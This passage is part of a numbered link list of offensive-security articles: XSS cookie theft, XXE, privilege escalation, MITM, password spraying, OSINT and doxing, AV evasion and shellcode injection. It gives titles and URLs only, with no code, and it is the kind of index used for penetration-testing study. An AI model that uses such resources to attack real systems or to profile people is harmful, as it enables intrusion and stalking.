Attacks:\n\n\n\n\nhttps://www.notion.so/d382649cfebd4c5da202677b6cad1d40\n\n\n\n\n-1648-OSCP Prep – Episode 11: Client Side Attacks:\n\n\n\n\nhttps://kentosec.com/2018/09/02/oscp-prep-episode-11-client-side-attacks/\n\n\n\n\n\n-1649-Client side attack - AV Evasion:\n\n\n\n\n\nhttps://rafalharazinski.gitbook.io/security/oscp/untitled-1/client-side-attack\n\n\n\n\n-1650-Client-Side Attack With Metasploit (Part 4):\n\n\n\n\nhttps://thehiddenwiki.pw/blog/2018/07/23/client-side-attack-metasploit/\n\n\n\n\n\n-1651-Ransomware: Latest Developments and How to Defend Against Them:\n\n\n\n\nhttps://www.recordedfuture.com/latest-ransomware-attacks/\n\n\n\n-1652-Cookie Tracking and Stealing using Cross-Site Scripting:\n\n\n\nhttps://www.geeksforgeeks.org/cookie-tracking-stealing-using-cross-site-scripting/\n\n\n\n\n-1653-How to Write an XSS Cookie Stealer in JavaScript to Steal Passwords:\n\n\n\nhttps://null-byte.wonderhowto.com/.../write-xss-cookie-stealer-javascript-steal-passwords-0180833\n\n\n\n-1654-How I 
was able to steal cookies via stored XSS in one of the famous e-commerce site:\n\n\n\n\nhttps://medium.com/@bhavarth33/how-i-was-able-to-steal-cookies-via-stored-xss-in-one-of-the-famous-e-commerce-site-3de8ab94437d\n\n\n\n\n-1655-Steal victim's cookie using Cross Site Scripting (XSS) :\n\n\n\n\nhttps://securityonline.info/steal-victims-cookie-using-cross-site-scripting-xss/\n\n\n\n\n-1656-Remote Code Execution — Damn Vulnerable Web Application(DVWA) - Medium level security:\n\n\n\n\nhttps://medium.com/@mikewaals/remote-code-execution-damn-vulnerable-web-application-dvwa-medium-level-security-ca283cda3e86\n\n\n\n\n-1657-Remote Command Execution:\n\n\n\nhttps://hacksland.net/remote-command-execution/\n\n\n\n\n-1658-DevOops — An XML External Entity (XXE) HackTheBox Walkthrough:\n\n\n\n\nhttps://medium.com/bugbountywriteup/devoops-an-xml-external-entity-xxe-hackthebox-walkthrough-fb5ba03aaaa2\n\n\n\n\n-1659-XML External Entity - Beyond /etc/passwd (For Fun & Profit):\n\n\n\n\nhttps://www.blackhillsinfosec.com/xml-external-entity-beyond-etcpasswd-fun-profit/\n\n\n\n\n-1660-XXE - ZeroSec - Adventures In Information Security:\n\n\n\n\nhttps://blog.zsec.uk/out-of-band-xxe-2/\n\n\n\n\n-1661-Exploitation: XML External Entity (XXE) Injection:\n\n\n\n\nhttps://depthsecurity.com/blog/exploitation-xml-external-entity-xxe-injection\n\n\n\n\n-1662-Hack The Box: DevOops:\n\n\n\n\nhttps://redteamtutorials.com/2018/11/11/hack-the-box-devoops/\n\n\n\n\n-1663-Web Application Penetration Testing Notes:\n\n\n\n\nhttps://techvomit.net/web-application-penetration-testing-notes/\n\n\n\n\n-1664-WriteUp – Aragog (HackTheBox) :\n\n\n\n\nhttps://ironhackers.es/en/writeups/writeup-aragog-hackthebox/\n\n\n\n\n-1665-Linux Privilege Escalation Using PATH Variable:\n\n\n\nhttps://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/\n\n\n\n\n-1666-Linux Privilege Escalation via Automated Script 
:\n\n\n\nhttps://www.hackingarticles.in/linux-privilege-escalation-via-automated-script/\n\n\n\n\n-1667-Privilege Escalation - Linux :\n\n\n\nhttps://chryzsh.gitbooks.io/pentestbook/privilege_escalation_-_linux.html\n\n\n\n-1668-Linux Privilege Escalation:\n\n\n\nhttps://percussiveelbow.github.io/linux-privesc/\n\n\n\n-1669-Perform Local Privilege Escalation Using a Linux Kernel Exploit :\n\n\n\nhttps://null-byte.wonderhowto.com/how-to/perform-local-privilege-escalation-using-linux-kernel-exploit-0186317/\n\n\n\n\n-1670-Linux Privilege Escalation With Kernel Exploit:\n\n\n\nhttps://www.yeahhub.com/linux-privilege-escalation-with-kernel-exploit-8572-c/\n\n\n\n-1671-Reach the root! How to gain privileges in Linux:\n\n\n\nhttps://hackmag.com/security/reach-the-root/\n\n\n\n-1672-Enumeration for Linux Privilege Escalation:\n\n\n\nhttps://0x00sec.org/t/enumeration-for-linux-privilege-escalation/1959\n\n\n\n\n-1673-Linux Privilege Escalation Scripts :\n\n\n\n\nhttps://netsec.ws/?p=309\n\n\n\n-1674-Understanding Privilege Escalation:\n\n\n\nwww.admin-magazine.com/Articles/Understanding-Privilege-Escalation\n\n\n\n\n\n-1675-Toppo:1 | Vulnhub Walkthrough:\n\n\n\nhttps://medium.com/egghunter/toppo-1-vulnhub-walkthrough-c5f05358cf7d\n\n\n\n\n-1676-Privilege Escalation resources:\n\n\n\nhttps://forum.hackthebox.eu/discussion/1243/privilege-escalation-resources\n\n\n\n\n-1678-OSCP Notes – Privilege Escalation (Linux):\n\n\n\nhttps://securism.wordpress.com/oscp-notes-privilege-escalation-linux/\n\n\n\n\n-1679-Udev Exploit Allows Local Privilege Escalation :\n\n\n\nwww.madirish.net/370\n\n\n\n\n-1680-Understanding Linux Privilege Escalation and Defending Against It:\n\n\n\n\nhttps://linux-audit.com/understanding-linux-privilege-escalation-and-defending-againt-it\n\n\n\n\n-1681-Windows Privilege Escalation Using PowerShell:\n\n\n\nhttps://hacknpentest.com/windows-privilege-escalation-using-powershell/\n\n\n\n-1682-Privilege Escalation | Azeria 
Labs:\n\n\n\n\nhttps://azeria-labs.com/privilege-escalation/\n\n\n\n\n-1683-Abusing SUDO (Linux Privilege Escalation):\n\n\n\nhttps://touhidshaikh.com/blog/?p=790\n\n\n\n-1684-Privilege Escalation - Linux:\n\n\n\nhttps://mysecurityjournal.blogspot.com/p/privilege-escalation-linux.html\n\n\n\n\n\n-1685-0day Linux Escalation Privilege Exploit Collection :\n\n\n\nhttps://blog.spentera.id/0day-linux-escalation-privilege-exploit-collection/\n\n\n\n\n-1686-Linux for Pentester: cp Privilege Escalation :\n\n\n\n\nhttps://hackin.co/articles/linux-for-pentester-cp-privilege-escalation.html\n\n\n\n\n-1687-Practical Privilege Escalation Using Meterpreter:\n\n\n\nhttps://ethicalhackingblog.com/practical-privilege-escalation-using-meterpreter/\n\n\n\n-1688-dirty_sock: Linux Privilege Escalation (via snapd):\n\n\n\nhttps://www.redpacketsecurity.com/dirty_sock-linux-privilege-escalation-via-snapd/\n\n\n\n\n-1689-Linux privilege escalation:\n\n\n\nhttps://jok3rsecurity.com/linux-privilege-escalation/\n\n\n\n\n-1690-The Complete Meterpreter Guide | Privilege Escalation & Clearing Tracks:\n\n\n\n\nhttps://hsploit.com/the-complete-meterpreter-guide-privilege-escalation-clearing-tracks/\n\n\n\n\n-1691-How to prepare for PWK/OSCP, a noob-friendly guide:\n\n\n\n\nhttps://www.abatchy.com/2017/03/how-to-prepare-for-pwkoscp-noob\n\n\n\n\n-1692-Basic Linux privilege escalation by kernel exploits:\n\n\n\nhttps://greysec.net/showthread.php?tid=1355\n\n\n\n\n-1693-Linux mount without root :\n\n\n\nepaymentamerica.com/tozkwje/xlvkawj2.php?trjsef=linux-mount-without-root\n\n\n\n\n-1694-Linux Privilege Escalation Oscp:\n\n\n\n\nwww.condadorealty.com/2h442/linux-privilege-escalation-oscp.html\n\n\n\n\n-1695-Privilege Escalation Attack Tutorial:\n\n\n\nhttps://alhilalgroup.info/photography/privilege-escalation-attack-tutorial\n\n\n\n\n-1696-Oscp Bethany Privilege Escalation:\n\n\n\nhttps://ilustrado.com.br/i8v7/7ogf.php?veac=oscp-bethany-privilege-escalation\n\n\n\n\n-1697-Hacking a Website and 
Gaining Root Access using Dirty COW Exploit:\n\n\n\nhttps://ethicalhackers.club/hacking-website-gaining-root-access-using-dirtycow-exploit/\n\n\n\n\n-1698-Privilege Escalation - Linux · Total OSCP Guide:\n\n\n\nhttps://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html\n\n\n\n\n-1699-Linux advanced privilege escalation:\n\n\n\nhttps://www.slideshare.net/JameelNabbo/linux-advanced-privilege-escalation\n\n\n\n-1700-Local Linux privilege escalation overview:\n\n\n\nhttps://myexperiments.io/linux-privilege-escalation.html\n\n\n\n-1701-Windows Privilege Escalation Scripts & Techniques :\n\n\n\nhttps://medium.com/@rahmatnurfauzi/windows-privilege-escalation-scripts-techniques-30fa37bd194\n\n\n\n\n-1702-Penetration Testing: Maintaining Access:\n\n\n\nhttps://resources.infosecinstitute.com/penetration-testing-maintaining-access/\n\n\n\n\n-1703-Kali Linux Maintaining Access :\n\n\n\nhttps://www.tutorialspoint.com/kali_linux/kali_linux_maintaining_access.htm\n\n\n\n-1704-Best Open Source Tools for Maintaining Access & Tunneling:\n\n\n\nhttps://n0where.net/maintaining-access\n\n\n\n-1705-Maintaining Access Part 1: Introduction and Metasploit Example:\n\n\n\nhttps://www.hackingloops.com/maintaining-access-metasploit/\n\n\n\n-1706-Maintaining Access - Ethical hacking and penetration testing:\n\n\n\nhttps://miloserdov.org/?cat=143\n\n\n\n-1707-Maintaining Access with Web Backdoors [Weevely]:\n\n\n\n\nhttps://www.yeahhub.com/maintaining-access-web-backdoors-weevely/\n\n\n\n\n\n-1708-Best Open Source MITM Tools: Sniffing & Spoofing:\n\n\n\nhttps://n0where.net/mitm-tools\n\n\n\n-1709-Cain and Abel - Man in the Middle (MITM) Attack Tool Explained:\n\n\n\nhttps://cybersguards.com/cain-and-abel-man-in-the-middle-mitm-attack-tool-explained/\n\n\n\n\n-1710-Man In The Middle Attack (MITM):\n\n\n\n\nhttps://medium.com/@nancyjohn.../man-in-the-middle-attack-mitm-114b53b2d987\n\n\n\n\n-1711-Real-World Man-in-the-Middle (MITM) Attack 
:\n\n\n\nhttps://ieeexplore.ieee.org/document/8500082\n\n\n\n-1712-The Ultimate Guide to Man in the Middle Attacks :\n\n\n\n\nhttps://doubleoctopus.com/blog/the-ultimate-guide-to-man-in-the-middle-mitm-attacks-and-how-to-prevent-them/\n\n\n\n\n\n-1713-How to Conduct ARP Spoofing for MITM Attacks:\n\n\n\nhttps://tutorialedge.net/security/arp-spoofing-for-mitm-attack-tutorial/\n\n\n\n-1714-How To Do A Man-in-the-Middle Attack Using ARP Spoofing & Poisoning:\n\n\n\nhttps://medium.com/secjuice/man-in-the-middle-attack-using-arp-spoofing-fa13af4f4633\n\n\n\n-1715-Ettercap and middle-attacks tutorial :\n\n\n\n\nhttps://pentestmag.com/ettercap-tutorial-for-windows/\n\n\n\n-1716-How To Setup A Man In The Middle Attack Using ARP Poisoning:\n\n\n\nhttps://online-it.nu/how-to-setup-a-man-in-the-middle-attack-using-arp-poisoning/\n\n\n\n-1717-Intro to Wireshark and Man in the Middle Attacks:\n\n\n\n\nhttps://www.commonlounge.com/discussion/2627e25558924f3fbb6e03f8f912a12d\n\n\n\n-1718-MiTM Attack with Ettercap:\n\n\n\nhttps://www.hackers-arise.com/single-post/2017/08/28/MiTM-Attack-with-Ettercap\n\n\n\n-1719-Man in the Middle Attack with Websploit Framework:\n\n\n\nhttps://www.yeahhub.com/man-middle-attack-websploit-framework/\n\n\n\n\n-1720-SSH MitM Downgrade :\n\n\n\nhttps://sites.google.com/site/clickdeathsquad/Home/cds-ssh-mitmdowngrade\n\n\n\n-1721-How to use Netcat for Listening, Banner Grabbing and Transferring Files:\n\n\n\nhttps://www.yeahhub.com/use-netcat-listening-banner-grabbing-transferring-files/\n\n\n\n\n-1722-Powershell port scanner and banner grabber:\n\n\n\nhttps://www.linkedin.com/pulse/powershell-port-scanner-banner-grabber-jeremy-martin/\n\n\n\n-1723-What is banner grabbing attack:\n\n\n\nhttps://rxkjftu.ga/sport/what-is-banner-grabbing-attack.php\n\n\n\n\n-1724-Network penetration testing:\n\n\n\nhttps://guif.re/networkpentest\n\n\n\n-1725-NMAP Cheatsheet:\n\n\n\nhttps://redteamtutorials.com/2018/10/14/nmap-cheatsheet/\n\n\n\n-1726-How To Scan a Network 
With Nmap:\n\n\n\nhttps://online-it.nu/how-to-scan-a-network-with-nmap/\n\n\n\n\n-1727-Hacking Metasploitable : Scanning and Banner grabbing:\n\n\n\nhttps://hackercool.com/2015/11/hacking-metasploitable-scanning-banner-grabbing/\n\n\n\n-1728-Penetration Testing of an FTP Server:\n\n\n\nhttps://shahmeeramir.com/penetration-testing-of-an-ftp-server-19afe538be4b\n\n\n\n\n-1729-Nmap Usage & Cheet-Sheet:\n\n\n\nhttps://aerroweb.wordpress.com/2018/03/14/namp-cheat-sheet/\n\n\n\n\n-1730-Discovering SSH Host Keys with NMAP:\n\n\n\nhttps://mwhubbard.blogspot.com/2015/03/discovering-ssh-host-keys-with-nmap.html\n\n\n\n\n-1731-Banner Grabbing using Nmap & NetCat - Detailed Explanation:\n\n\n\nhttps://techincidents.com/banner-grabbing-using-nmap-netcat\n\n\n\n\n-1732-Nmap – (Vulnerability Discovery):\n\n\n\nhttps://crazybulletctfwriteups.wordpress.com/2015/09/5/nmap-vulnerability-discovery/\n\n\n\n\n\n-1733-Penetration Testing on MYSQL (Port 3306):\n\n\n\nhttps://www.hackingarticles.in/penetration-testing-on-mysql-port-3306/\n\n\n\n-1774-Password Spraying - Infosec Resources :\n\n\n\nhttps://resources.infosecinstitute.com/password-spraying/\n\n\n\n-1775-Password Spraying- Common mistakes and how to avoid them:\n\n\n\nhttps://medium.com/@adam.toscher/password-spraying-common-mistakes-and-how-to-avoid-them-3fd16b1a352b\n\n\n\n\n-1776-Password Spraying Tutorial:\n\n\n\nhttps://attack.stealthbits.com/password-spraying-tutorial-defense\n\n\n\n\n-1777-password spraying Archives:\n\n\n\nhttps://www.blackhillsinfosec.com/tag/password-spraying/\n\n\n\n-1778-The 21 Best Email Finding Tools::\n\n\n\nhttps://beamery.com/blog/find-email-addresses\n\n\n\n\n-1779-OSINT Primer: People (Part 2):\n\n\n\nhttps://0xpatrik.com/osint-people/\n\n\n\n\n-1780-Discovering Hidden Email Gateways with OSINT Techniques:\n\n\n\nhttps://blog.ironbastion.com.au/discovering-hidden-email-servers-with-osint-part-2/\n\n\n\n\n-1781-Top 20 Data Reconnaissance and Intel Gathering Tools 
:\n\n\n\nhttps://securitytrails.com/blog/top-20-intel-tools\n\n\n\n\n-1782-101+ OSINT Resources for Investigators [2019]:\n\n\n\nhttps://i-sight.com/resources/101-osint-resources-for-investigators/\n\n\n\n-1783-Digging Through Someones Past Using OSINT:\n\n\n\nhttps://nullsweep.com/digging-through-someones-past-using-osint/\n\n\n\n\n-1784-Gathering Open Source Intelligence:\n\n\n\nhttps://posts.specterops.io/gathering-open-source-intelligence-bee58de48e05\n\n\n\n-1785-How to Locate the Person Behind an Email Address:\n\n\n\nhttps://www.sourcecon.com/how-to-locate-the-person-behind-an-email-address/\n\n\n\n\n-1786-Find hacked email addresses and check breach mails:\n\n\n\nhttps://www.securitynewspaper.com/2019/01/16/find-hacked-email-addresses/\n\n\n\n\n-1787-A Pentester's Guide - Part 3 (OSINT, Breach Dumps, & Password :\n\n\n\nhttps://delta.navisec.io/osint-for-pentesters-part-3-password-spraying-methodology/\n\n\n\n\n-1788-Top 10 OSINT Tools/Sources for Security Folks:\n\n\n\nwww.snoopysecurity.github.io/osint/2018/08/02/10_OSINT_for_security_folks.html\n\n\n\n\n-1789-Top 5 Open Source OSINT Tools for a Penetration Tester:\n\n\n\nhttps://www.breachlock.com/top-5-open-source-osint-tools/\n\n\n\n\n-1790-Open Source Intelligence tools for social media: my own list:\n\n\n\nhttps://www.andreafortuna.org/2017/03/20/open-source-intelligence-tools-for-social-media-my-own-list/\n\n\n\n\n-1791-Red Teaming: I can see you! 
Insights from an InfoSec expert :\n\n\n\n\nhttps://www.perspectiverisk.com/i-can-see-you-osint/\n\n\n\n\n-1792-OSINT Playbook for Recruiters:\n\n\n\nhttps://amazinghiring.com/osint-playbook/\n\n\n\n\n-1793- Links for Doxing, Personal OSInt, Profiling, Footprinting, Cyberstalking:\n\n\n\n\nhttps://www.irongeek.com/i.php?page=security/doxing-footprinting-cyberstalking\n\n\n\n-1794-Open Source Intelligence Gathering 201 (Covering 12 additional techniques):\n\n\n\nhttps://blog.appsecco.com/open-source-intelligence-gathering-201-covering-12-additional-techniques-b76417b5a544?gi=2afe435c630a\n\n\n\n\n-1795-Online Investigative Tools for Social Media Discovery and Locating People:\n\n\n\nhttps://4thetruth.info/colorado-private-investigator-online-detective-social-media-and-online-people-search-online-search-tools.html\n\n\n\n\n-1796-Expanding Skype Forensics with OSINT: Email Accounts:\n\n\n\n\nhttp://www.automatingosint.com/blog/2016/05/expanding-skype-forensics-with-osint-email-accounts/\n\n\n\n\n-1798-2019 OSINT Guide:\n\n\n\nhttps://www.randhome.io/blog/2019/01/05/2019-osint-guide/\n\n\n\n-1799-OSINT - Passive Recon and Discovery of Assets:\n\n\nhttps://0x00sec.org/t/osint-passive-recon-and-discovery-of-assets/6715\n\n\n\n-1800-OSINT With Datasploit:\n\n\n\nhttps://dzone.com/articles/osint-with-datasploit\n\n\n\n\n-1801-Building an OSINT Reconnaissance Tool from Scratch:\n\n\n\nhttps://medium.com/@SundownDEV/phone-number-scanning-osint-recon-tool-6ad8f0cac27b\n\n\n\n\n-1802-Find Identifying Information from a Phone Number Using OSINT Tools:\n\n\n\nhttps://null-byte.wonderhowto.com/how-to/find-identifying-information-from-phone-number-using-osint-tools-0195472/\n\n\n\n-1803-Find Details Of any Mobile Number, Email ID, IP Address in the world (Step By Step):\n\n\n\nhttps://www.securitynewspaper.com/2019/05/02/find-details-of-any-mobile-number-email-id-ip-address-in-the-world-step-by-step/\n\n\n\n\n-1804-Investigative tools for finding people online and keeping yourself 
safe:\n\n\n\nhttps://ijnet.org/en/story/investigative-tools-finding-people-online-and-keeping-yourself-safe\n\n\n\n-1805- Full text of ""The Hacker Playbook 2 Practical Guide To Penetration Testing By Peter Kim"":\n\n\n\nhttps://archive.org/stream/TheHackerPlaybook2PracticalGuideToPenetrationTestingByPeterKim/The%20Hacker%20Playbook%202%20-%20Practical%20Guide%20To%20Penetration%20Testing%20By%20Peter%20Kim_djvu.txt\n\n\n\n-1806-The Internet Archive offers over 15,000,000 freely downloadable books and texts. There is also a collection of 550,000 modern eBooks that may be borrowed by anyone with a free archive.org account:\n\n\n\nhttps://archive.org/details/texts?and%5B%5D=hacking&sin=\n\n\n\n-1807-Exploiting SSRF like a Boss — Escalation of an SSRF to Local File Read!:\n\n\n\nhttps://medium.com/@zain.sabahat/exploiting-ssrf-like-a-boss-c090dc63d326\n\n\n\n-1808-How to Pass OSCP Like Boss:\n\n\n\nhttps://medium.com/@parthdeshani/how-to-pass-oscp-like-boss-b269f2ea99d\n\n\n\n\n-1809-Deploy a private Burp Collaborator Server in Azure:\n\n\n\n https://medium.com/bugbountywriteup/deploy-a-private-burp-collaborator-server-in-azure-f0d932ae1d70\n \n \n \n \n -1810-Using Shodan Better Way! 
:):\n \n \n \n https://medium.com/bugbountywriteup/using-shodan-better-way-b40f330e45f6\n \n \n \n \n-1811-How To Do Your Reconnaissance Properly Before Chasing A Bug Bounty:\n \n \n \n https://medium.com/bugbountywriteup/guide-to-basic-recon-bug-bounties-recon-728c5242a115 \n \n \n \n \n -1812-How we got LFI in apache Drill (Recon like a boss)::\n \n \n \n \n \n https://medium.com/bugbountywriteup/how-we-got-lfi-in-apache-drill-recon-like-a-boss-6f739a79d87d\n \n \n \n \n-1813-Chaining Self XSS with UI Redressing is Leading to Session Hijacking:\n \n \n \n \n https://medium.com/bugbountywriteup/chaining-self-xss-with-ui-redressing-is-leading-to-session-hijacking-pwn-users-like-a-boss-efb46249cd14\n \n \n \n \n-1814-Week in OSINT #2019–19:\n\n\nhttps://medium.com/week-in-osint/week-in-osint-2019-18-1975fb8ea43a4\n\n\n-1814-Week in OSINT #2019–02:\n\n\n\nhttps://medium.com/week-in-osint/week-in-osint-2019-02-d4009c27e85f\n\n\n\n-1815-Week in OSINT #2019–24:\n\n\n\nhttps://medium.com/week-in-osint/week-in-osint-2019-24-4fcd17ca908f\n\n\n\n\n-1816-Page Admin Disclosure | Facebook Bug Bounty 2019:\n\n\n\n\nhttps://medium.com/bugbountywriteup/page-admin-disclosure-facebook-bug-bounty-2019-ee9920e768eb\n\n\n\n\n\n-1817-XSS in Edmodo within 5 Minute (My First Bug Bounty):\n\n\n\n\nhttps://medium.com/@valakeyur/xss-in-edmodo-within-5-minute-my-first-bug-bounty-889e3da6167d\n\n\n\n\n-1818-Collection Of Bug Bounty Tip-Will Be updated daily:\n\n\n\n\nhttps://medium.com/@vignesh4303/collection-of-bug-bounty-tip-will-be-updated-daily-605911cfa248\n\n\n\n\n\n-1819-A Unique XSS Scenario in SmartSheet || $1000 bounty.:\n\n\n\n\nhttps://medium.com/@rohanchavan/a-unique-xss-scenario-1000-bounty-347f8f92fcc6\n\n\n\n\n-1820-How I found a simple bug in Facebook without any Test:\n\n\n\nhttps://medium.com/bugbountywriteup/how-i-found-a-simple-bug-in-facebook-without-any-test-3bc8cf5e2ca2\n\n\n\n\n-1821-Facebook BugBounty — Disclosing page 
members:\n\n\n\nhttps://medium.com/@tnirmalz/facebook-bugbounty-disclosing-page-members-1178595cc520\n\n\n\n\n\n-1822-Don’t underestimates the Errors They can provide good $$$ Bounty!:\n\n\n\n\nhttps://medium.com/@noob.assassin/dont-underestimates-the-errors-they-can-provide-good-bounty-d437ecca6596\n\n\n\n-1823-Django and Web Security Headers:\n\n\n\nhttps://medium.com/@ksarthak4ever/django-and-web-security-headers-d72a9e54155e\n\n\n\n\n-1824-Weaponising Staged Cross-Site Scripting (XSS) Payloads:\n\n\n\n\nhttps://medium.com/redteam/weaponising-staged-cross-site-scripting-xss-payloads-7b917f605800\n\n\n\n\n-1825-How I was able to Bypass XSS Protection on HackerOne’s Private Program:\n\n\n\nhttps://medium.com/@vulnerabilitylabs/how-i-was-able-to-bypass-xss-protection-on-hackerones-private-program-8914a31339a9\n\n\n\n\n\n-1826-XSS in Microsoft subdomain:\n\n\n\nhttps://blog.usejournal.com/xss-in-microsoft-subdomain-81c4e46d6631\n\n\n\n\n-1827-How Angular Protects Us From XSS Attacks?:\n\n\n\nhttps://medium.com/hackernoon/how-angular-protects-us-from-xss-attacks-3cb7a7d49d95\n\n\n\n\n\n-1828-[FUN] Bypass XSS Detection WAF:\n\n\n\n\nhttps://medium.com/soulsecteam/fun-bypass-xss-detection-waf-cabd431e030e\n\n\n\n\n\n-1829-Bug Hunting Methodology(Part-2):\n\n\n\n\nhttps://blog.usejournal.com/bug-hunting-methodology-part-2-5579dac06150\n\n\n\n\n\n-1830-Learn Web Application Penetration Testing:\n\n\n\n\nhttps://blog.usejournal.com/web-application-penetration-testing-9fbf7533b361\n\n\n\n\n\n-1831-“Exploiting a Single Parameter”:\n\n\n\nhttps://medium.com/securitywall/exploiting-a-single-parameter-6f4ba2acf523\n\n\n\n-1832-CORS To CSRF Attack:\n\n\n\nhttps://blog.usejournal.com/cors-to-csrf-attack-c33a595d441\n\n\n\n\n-1833-Account Takeover Using CSRF(json-based):\n\n\n\nhttps://medium.com/@shub66452/account-takeover-using-csrf-json-based-a0e6efd1bffc\n\n\n\n-1834-Bypassing Anti-CSRF with Burp Suite Session 
Handling:\n\n\nhttps://bestestredteam.com/tag/anti-csrf/\n\n\n\n-1835-10 Methods to Bypass Cross Site Request Forgery (CSRF):\n\n\n\nhttps://haiderm.com/10-methods-to-bypass-cross-site-request-forgery-csrf/\n\n\n\n\n\n-1836-Exploiting CSRF on JSON endpoints with Flash and redirects:\n\n\n\n\nhttps://medium.com/p/681d4ad6b31b\n\n\n\n\n-1837-Finding and exploiting Cross-site request forgery (CSRF):\n\n\n\nhttps://securityonline.info/finding-exploiting-cross-site-request-forgery/\n\n\n\n-1838-Hacking Facebook accounts using CSRF in Oculus-Facebook integration:\n\n\n\n\nhttps://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf\n\n\n\n\n-1839-Synchronizer Token Pattern: No more tricks:\n\n\n\nhttps://medium.com/p/d2af836ccf71\n\n\n\n\n-1840-The $12,000 Intersection between Clickjacking, XSS, and Denial of Service:\n\n\n\n\nhttps://medium.com/@imashishmathur/the-12-000-intersection-between-clickjacking-xss-and-denial-of-service-f8cdb3c5e6d1\n\n\n-1841-XML External Entity(XXE):\n\n\nhttps://medium.com/@ghostlulzhacks/xml-external-entity-xxe-62bcd1555b7b\n\n\n\n-1842-XXE Attacks— Part 1: XML Basics:\n\n\n\nhttps://medium.com/@klose7/https-medium-com-klose7-xxe-attacks-part-1-xml-basics-6fa803da9f26\n\n\n\n-1843-From XXE to RCE with PHP/expect — The Missing Link:\n\n\n\n\n\nhttps://medium.com/@airman604/from-xxe-to-rce-with-php-expect-the-missing-link-a18c265ea4c7\n\n\n\n\n\n-1844-My first XML External Entity (XXE) attack with .gpx file:\n\n\n\n\nhttps://medium.com/@valeriyshevchenko/my-first-xml-external-entity-xxe-attack-with-gpx-file-5ca78da9ae98\n\n\n\n\n\n\n-1845-Open Redirects & Security Done Right!:\n\n\n\n\nhttps://medium.com/@AkshaySharmaUS/open-redirects-security-done-right-e524a3185496\n\n\n\n\n-1846-XXE on Windows system …then what ??:\n\n\n\n\n\nhttps://medium.com/@canavaroxum/xxe-on-windows-system-then-what-76d571d66745\n\n\n\n\n\n-1847-Unauthenticated Blind SSRF in Oracle EBS 
CVE-2018-3167:\n\n\n\n\nhttps://medium.com/@x41x41x41/unauthenticated-ssrf-in-oracle-ebs-765bd789a145\n\n\n\n\n\n\n-1848-SVG XLink SSRF fingerprinting libraries version:\n\n\n\n\nhttps://medium.com/@arbazhussain/svg-xlink-ssrf-fingerprinting-libraries-version-450ebecc2f3c\n\n\n\n\n\n-1849-What is XML Injection Attack:\n\n\n\n\n\nhttps://medium.com/@dahiya.aj12/what-is-xml-injection-attack-279691bd00b6\n\n\n\n\n\n\n\n\n-1850-SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1:\n\n\n\n\nhttps://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978\n\n\n\n\n-1851-Penetration Testing Introduction: Scanning & Reconnaissance:\n\n\nhttps://medium.com/cyberdefenders/penetration-testing-introduction-scanning-reconnaissance-f865af0761f\n\n\n\n\n-1852-Beginner’s Guide to recon automation.:\n\n\n\nhttps://medium.com/bugbountywriteup/beginners-guide-to-recon-automation-f95b317c6dbb\n\n\n\n\n\n-1853-Red Teamer’s Guide to Pulse Secure SSL VPN:\n\n\n\nhttps://medium.com/bugbountywriteup/pulse-secure-ssl-vpn-post-auth-rce-to-ssh-shell-2b497d35c35b\n\n\n\n\n\n-1854-CVE-2019-15092 WordPress Plugin Import Export Users = 1.3.0 - CSV Injection:\n\n\n\nhttps://medium.com/bugbountywriteup/cve-2019-15092-wordpress-plugin-import-export-users-1-3-0-csv-injection-b5cc14535787\n\n\n\n\n-1855-How I harvested Facebook credentials via free wifi?:\n\n\n\nhttps://medium.com/bugbountywriteup/how-i-harvested-facebook-credentials-via-free-wifi-5da6bdcae049\n\n\n\n\n-1856-How to hack any Payment Gateway?:\n\n\n\n\nhttps://medium.com/bugbountywriteup/how-to-hack-any-payment-gateway-1ae2f0c6cbe5\n\n\n\n\n-1857-How I hacked into my neighbour’s WiFi and harvested login credentials?:\n\n\n\n\nhttps://medium.com/bugbountywriteup/how-i-hacked-into-my-neighbours-wifi-and-harvested-credentials-487fab106bfc\n\n\n\n\n-1858-What do Netcat, SMTP and self XSS have in common? 
Stored XSS:\n\n\n\n\nhttps://medium.com/bugbountywriteup/what-do-netcat-smtp-and-self-xss-have-in-common-stored-xss-a05648b72002\n\n\n\n\n\n-1859-1-Click Account Takeover in Virgool.io — a Nice Case Study:\n\n\n\nhttps://medium.com/bugbountywriteup/1-click-account-takeover-in-virgool-io-a-nice-case-study-6bfc3cb98ef2\n\n\n\n\n\n-1860-Digging into Android Applications — Part 1 — Drozer + Burp:\n\n\n\n\nhttps://medium.com/bugbountywriteup/digging-android-applications-part-1-drozer-burp-4fd4730d1cf2\n\n\n\n\n-1861-Linux for Pentester: APT Privilege Escalation:\n\n\n\nhttps://www.hackingarticles.in/linux-for-pentester-apt-privilege-escalation\n\n\n\n\n\n-1862-Linux for Pentester : ZIP Privilege Escalation:\n\n\n\nhttps://www.hackingarticles.in/linux-for-pentester-zip-privilege-escalation\n\n\n\n\n-1863-Koadic - COM Command & Control Framework:\n\n\n\nhttps://www.hackingarticles.in/koadic-com-command-control-framework\n\n\n\n\n\n-1864-Configure Sqlmap for WEB-GUI in Kali Linux :\n\n\n\n\nhttps://www.hackingarticles.in/configure-sqlmap-for-web-gui-in-kali-linux\n\n\n\n\n\n-1865-Penetration Testing:\n\n\n\nhttps://www.hackingarticles.in/Penetration-Testing\n\n\n-1866-Buffer Overflow Examples, Code execution by shellcode :\n\n\nhttps://0xrick.github.io/binary-exploitation/bof5\n\n\n\n-1867-Dynamic Shellcode Execution:\n\n\n\nhttps://www.countercept.com/blog/dynamic-shellcode-execution\n\n\n\n\n-1868-JSC Exploits:\n\n\n\n\n-https://googleprojectzero.blogspot.com/2019/08/jsc-exploits.html\n\n\n\n\n-1869-Injecting Into The Hunt:\n\n\n\n\nhttps://jsecurity101.com/2019/Injecting-Into-The-Hunt\n\n\n\n\n-1870-Bypassing Antivirus with Golang:\n\n\n\nhttps://labs.jumpsec.com/2019/06/20/bypassing-antivirus-with-golang-gopher.it\n\n\n\n\n\n-1871-Windows Process Injection: Print Spooler:\n\n\n\nhttps://modexp.wordpress.com/2019/03/07/process-injection-print-spooler\n\n\n\n\n-1872-Inject Shellcode Into Memory Using Unicorn 
